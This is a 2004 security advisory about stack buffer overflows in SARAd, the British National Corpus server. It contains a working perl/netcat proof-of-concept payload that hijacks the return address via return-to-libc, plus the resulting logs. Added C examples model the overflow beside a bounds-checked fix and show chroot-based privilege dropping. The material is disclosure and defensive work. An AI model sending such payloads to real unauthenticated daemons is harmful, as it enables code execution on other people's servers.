
| Subject: | [UNIX] SARAd Buffer Overflow Vulnerability |
|---|---|
| Date: | 25 Aug 2004 16:39:34 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

SARAd Buffer Overflow Vulnerability
------------------------------------------------------------------------

SUMMARY

<http://www.natcorp.ox.ac.uk/SARA/> SARA is specialized software used to serve the content of the British National Corpus (BNC). The British National Corpus is used by many linguists for research on the English language and is licensed commercially by the BNC Consortium. The server software runs on various flavors of Unix and is freely available as source. There are several buffer overflows present in the SARA server (SARAd), one of which is exploitable, allowing an attacker to execute arbitrary code on the server.

DETAILS

Vulnerable Systems:
 * SARA latest version, 16th April 2001

Successful exploitation of the buffer overflow results in code execution with the privileges of the SARA daemon. That should be a dedicated unprivileged account, but most installations run the daemon as root. The daemon requires no authentication, so the attack is easy to carry out. The overflows are classic stack-based buffer overflows caused by insufficient bounds checking, which lets the attacker overwrite the saved return address.
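The overflow described above, modelled in C as an added example. This is not SARAd's code and not part of the advisory: a byte array stands in for the stack frame, with its last word playing the saved return address, so the overwrite can be observed without corrupting the real stack. The payload layout (44 filler bytes, a 4-byte little-endian address, a terminating NUL) is the one the advisory's perl one-liner sends; the 44-byte buffer size and the buffer-then-return-address layout are assumptions chosen to match that filler length, not SARAd's real frame.

```c
/* Added example, written for this page; not code from SARAd or the advisory.
 * Models a strcpy()-style unchecked copy beside a bounds-checked one, driven
 * by the advisory's payload layout. BUF_LEN and the frame layout are assumed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   44                 /* assumed: matches "SUCK" x 11 */
#define RET_OFF   BUF_LEN            /* assumed: return slot right after buffer */
#define FRAME_LEN (BUF_LEN + 4 + 4)  /* buffer, return slot, one spare word */

struct frame {
    unsigned char bytes[FRAME_LEN];  /* simulated stack frame */
};

/* Read the simulated return slot as a little-endian 32-bit value (x86). */
static uint32_t frame_ret(const struct frame *f) {
    const unsigned char *p = f->bytes + RET_OFF;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the advisory's payload: "SUCK" x 11, then `target` little-endian,
 * then a NUL so a strcpy()-style copy stops there. Returns the number of
 * bytes written including the NUL (49), or 0 if `cap` is too small. */
static size_t build_payload(unsigned char *out, size_t cap, uint32_t target) {
    size_t n = 0;
    if (cap < BUF_LEN + 5) return 0;
    for (int i = 0; i < 11; i++) { memcpy(out + n, "SUCK", 4); n += 4; }
    for (int i = 0; i < 4; i++) out[n++] = (unsigned char)(target >> (8 * i));
    out[n++] = 0;
    return n;
}

/* Vulnerable handler: copies until the attacker's NUL, never checking the
 * buffer size, so bytes 44..47 of the message land in the return slot.
 * Callers keep msg within FRAME_LEN so the model itself stays memory-safe. */
static void handle_unchecked(struct frame *f, const unsigned char *msg) {
    size_t i = 0;
    for (;;) {
        f->bytes[i] = msg[i];
        if (msg[i] == 0) break;
        i++;
    }
}

/* Fixed handler: reject, rather than silently truncate, anything that does
 * not fit together with its terminator. Returns 0 on success, -1 if too long. */
static int handle_checked(struct frame *f, const unsigned char *msg, size_t len) {
    if (len >= BUF_LEN) return -1;
    memcpy(f->bytes, msg, len);
    f->bytes[len] = 0;
    return 0;
}

/* What ends up in the return slot after the unchecked copy of the payload. */
static uint32_t ret_after_unchecked(uint32_t target) {
    struct frame f;
    unsigned char payload[FRAME_LEN];
    memset(&f, 0, sizeof f);
    if (build_payload(payload, sizeof payload, target) == 0) return 0;
    handle_unchecked(&f, payload);
    return frame_ret(&f);
}

/* Verdict of the checked handler on the same payload (-1 = rejected). */
static int checked_verdict(uint32_t target) {
    struct frame f;
    unsigned char payload[FRAME_LEN];
    size_t n = build_payload(payload, sizeof payload, target);
    return handle_checked(&f, payload, n ? n - 1 : 0);  /* length without NUL */
}

/* Return slot after the checked handler ran: the 0xAA sentinel must survive. */
static uint32_t ret_after_checked(uint32_t target) {
    struct frame f;
    unsigned char payload[FRAME_LEN];
    memset(&f, 0xAA, sizeof f);
    size_t n = build_payload(payload, sizeof payload, target);
    (void)handle_checked(&f, payload, n ? n - 1 : 0);
    return frame_ret(&f);
}

int main(void) {
    const uint32_t syslog_addr = 0x4014db90u;  /* decoded from the advisory's bytes */
    uint32_t slot_unchecked = ret_after_unchecked(syslog_addr);
    int verdict = checked_verdict(syslog_addr);
    uint32_t slot_checked = ret_after_checked(syslog_addr);
    printf("unchecked: return slot = 0x%08x\n", slot_unchecked);
    printf("checked:   verdict = %d, return slot = 0x%08x\n", verdict, slot_checked);
    return 0;
}
```

Running it shows the unchecked copy leaving 0x4014db90 in the return slot, while the checked handler returns -1 and leaves the slot untouched. The fix rejects oversized input instead of truncating it because a silently truncated message can still be a malformed or hostile one; failing the request is the safer default for an unauthenticated network daemon.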
The following perl snippet does a return-to-libc on Linux 2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog(). It sends 44 bytes of filler ("SUCK" x 11), then the bytes 0x90 0xdb 0x14 0x40, i.e. the little-endian address 0x4014db90 (syslog() in that glibc build), followed by a terminating NUL:

    perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
      | netcat victim 7000

The output from this simple operation is:

    Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
    Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
    Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540
    Aug 19 20:50:05 drgonzo sarad[6519]:P^F
    Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
    Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11

The "unknown facility/priority" line shows that syslog() was entered with whatever happened to be on the stack as its arguments, which confirms control of the return address; the child then dies with SIGSEGV (signal 11) when syslog() returns to a garbage address. The parent process (pid 2449) survives and only logs the child's death.

Patch Availability:
Although there is no official patch and the program is quite old, there are two unofficial patches. One should be suitable for all systems and fixes the above-mentioned bugs; the other does the same and additionally makes the SARA daemon chroot itself to the corpus directory and drop its rights to a specified account. The latter will not compile on Windows, even though the server itself can be compiled on Windows. The patches, including fairly simple installation instructions, are available from:
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz

ADDITIONAL INFORMATION

The information has been provided by Matthias Bethke <Matthias.Bethke@gmx.net>.
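The chroot-and-drop-rights behaviour described under Patch Availability, as an added example of how a daemon should do it. This is not the unofficial SARA patch and not code from the advisory: it shows the order of operations (resolve the account before chroot, chroot then chdir, clear supplementary groups, setgid before setuid) and verifies afterwards that root cannot be regained, failing closed if it can. The account name "sara", the corpus directory and the function names are illustrative assumptions.

```c
/* Added example, not the unofficial SARA patch: confine a daemon to its data
 * directory and give up root, checking the post-conditions rather than
 * assuming them. Account name and directory in main() are assumed. */
#define _GNU_SOURCE 1
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#ifdef __linux__
/* Explicit prototypes so this also compiles under strict -std= flags, where
 * glibc's headers omit these non-ISO functions; harmless otherwise. */
int chroot(const char *path);
int setgroups(size_t size, const gid_t *list);
#endif

/* Resolve the account *before* chroot(): /etc/passwd is not visible after it.
 * Returns 0 and fills uid/gid, or -1 with errno set. */
static int lookup_account(const char *name, uid_t *uid, gid_t *gid) {
    errno = 0;
    struct passwd *pw = getpwnam(name);
    if (pw == NULL) {
        if (errno == 0) errno = ENOENT;  /* "not found" does not set errno */
        return -1;
    }
    *uid = pw->pw_uid;
    *gid = pw->pw_gid;
    return 0;
}

/* Confine the process to `dir` and switch to uid/gid. Returns 0 on success,
 * -1 with errno set. Call while still root, after privileged setup (binding
 * the port, opening logs) and before any client data is parsed. Refuses
 * uid/gid 0, since "dropping" to root drops nothing. */
static int confine_and_drop(const char *dir, uid_t uid, gid_t gid) {
    if (uid == 0 || gid == 0) { errno = EINVAL; return -1; }

    /* 1. chroot(), then chdir("/"): without the chdir the cwd still points
     *    outside the jail and a relative "../" walks straight back out. */
    if (chroot(dir) != 0) return -1;
    if (chdir("/") != 0) return -1;

    /* 2. Supplementary groups are not cleared by setgid(); drop them first. */
    if (setgroups(0, NULL) != 0) return -1;

    /* 3. Group before user: once the euid is unprivileged, setgid() fails. */
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;

    /* 4. Verify the drop is permanent: if root can be regained, fail closed. */
    if (setuid(0) == 0 || setgid(0) == 0) { errno = EPERM; return -1; }
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void) {
    const char *account = "sara";                     /* assumed account */
    const char *corpus_dir = "/var/lib/sara/corpus";  /* assumed directory */
    uid_t uid;
    gid_t gid;

    if (lookup_account(account, &uid, &gid) != 0) {
        fprintf(stderr, "lookup %s: %s\n", account, strerror(errno));
        return 1;
    }
    if (confine_and_drop(corpus_dir, uid, gid) != 0) {
        fprintf(stderr, "confine_and_drop: %s\n", strerror(errno));
        return 1;  /* refuse to serve rather than serve as root */
    }
    printf("serving as uid=%u gid=%u with root at %s\n",
           (unsigned)getuid(), (unsigned)getgid(), corpus_dir);
    return 0;
}
```

The verification step matters more than it looks: on a system where the saved set-user-ID is left untouched, setuid(0) succeeds again after the drop, and a daemon that only checks the return value of setuid(uid) would believe it was unprivileged while any later memory-corruption bug could hand root straight back.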